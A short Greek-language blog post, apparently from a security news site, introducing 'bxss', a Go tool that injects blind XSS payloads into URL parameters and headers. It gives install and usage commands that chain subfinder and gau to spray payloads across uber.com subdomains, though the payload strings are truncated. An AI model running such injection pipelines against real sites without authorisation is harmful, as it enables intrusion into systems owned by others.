Bxss: Εργαλείο εύρεσης Blind XSS Injector

Το είναι ένα script γραμμένο σε go, που μας βοπθάει να ανακαλύπτουμε Blind XSS Injector κενά ασφαλείας.

Χαρακτηριστικά

Εισάγετε Blind XSS payloads σε προσαρμοσμένες κεφαλίδες
Εισάγετε Blind XSS payloads σε παραμέτρους
Χρησιμοποιεί διαφορετικές μεθόδους αιτήματος (PUT, POST, GET, OPTIONS) ταυτόχρονα
Διαθέτει μεγάλη αλυσίδα εργαλείων
Πραγματικά πολύ γρήγορο
Εύκολο στην εγκατάσταση

Εγκατάσταση

$ go get -u github.com/ethicalhackingplayground/bxss

Χρήση

Blind XSS In Parameters

$ subfinder uber.com | gau | grep “&” | bxss -appendMode -payload ‘”>‘ -parameters

Blind XSS In X-Forwarded-For Header

$ subfinder uber.com | gau | bxss -payload ‘”>‘ -header “X-Forwarded-For”

Στιγμιότυπα εφαρμογής

 

Μπορείτε να κατεβάσετε το πρόγραμμα από εδώ.

  SteaLinG: Framework σχεδιασμένο για Social Engineering επιθέσεις!

Written by Anastasis Vasileiadis

Οι μεταφράσεις είναι σαν τις γυναίκες. Όταν είναι ωραίες δεν είναι πιστές και όταν είναι πιστές δεν είναι ωραίες.

Αφήστε μια απάντηση

Η ηλ. διεύθυνση σας δεν δημοσιεύεται. Τα υποχρεωτικά πεδία σημειώνονται με *

Το μήνυμα σας δεν θα δημοσιευτεί εάν:
1. Περιέχει υβριστικά, συκοφαντικά, ρατσιστικά, προσβλητικά ή ανάρμοστα σχόλια.
2. Προκαλεί βλάβη σε ανηλίκους.
3. Παρενοχλεί την ιδιωτική ζωή και τα ατομικά και κοινωνικά δικαιώματα άλλων χρηστών.
4. Διαφημίζει προϊόντα ή υπηρεσίες ή διαδικτυακούς τόπους .
5. Περιέχει προσωπικές πληροφορίες (διεύθυνση, τηλέφωνο κλπ).


  +  27  =  28